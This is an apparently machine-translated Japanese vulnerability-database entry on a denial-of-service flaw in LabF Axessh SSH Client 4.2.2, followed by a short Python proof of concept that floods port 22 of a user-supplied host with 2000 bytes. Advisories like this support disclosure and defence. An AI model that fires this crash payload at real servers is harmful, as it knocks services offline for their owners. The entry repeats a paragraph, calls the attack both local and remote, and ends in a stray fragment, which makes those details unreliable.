LabF Axessh SSH Client 4.2.2 サービス拒否

履歴差分リンクするjsonxmlCTI

CVSS 一時的なメタスコア	現在のエクスプロイト価格 (≈)	CTI注目指数
3.0	$0-$5k	0.00

要約情報

脆弱性が LabF Axessh SSH Client 4.2.2 内に見つかりました。この脆弱性は問題があるとして分類されました。影響を受けるのは不明な関数です。操作結果としてサービス拒否につながります。攻撃はローカルでのみ実施可能です。さらに、入手できるエクスプロイトツールが存在します。

脆弱性が LabF Axessh SSH Client 4.2.2 内に見つかりました。この脆弱性は問題があるとして分類されました。影響を受けるのは不明な関数です。操作結果としてサービス拒否につながります。 CWEによる問題の宣言は、CWE-404 につながります。この脆弱性は公開されました 2016年11月05日によりJohn Page (hyp3rlinx) としてAxessh 4.2.2 Denial Of Service としてMailinglist Post （Full-Disclosure）。アドバイザリはseclists.orgでダウンロードできます。

攻撃はローカルでのみ実施可能です。入手できる技術的詳細情報はありません。この脆弱性の普及度は平均未満です。さらに、入手できるエクスプロイトツールが存在します。エクスプロイトが公開されており、使用される可能性があります。現在の時点で、エクスプロイトの価格はおおよそUSD $0-$5kかもしれません。

概念実証であると宣言されています。エクスプロイトツールは seclists.org にダウンロードのために共有されています。 0dayとして、推定される闇市場取引価格はおよそ $0-$5k でした。エクスプロイトツールには下記のコードが含まれています。

import socket
print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"
ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)

】のプラグインを提供しています。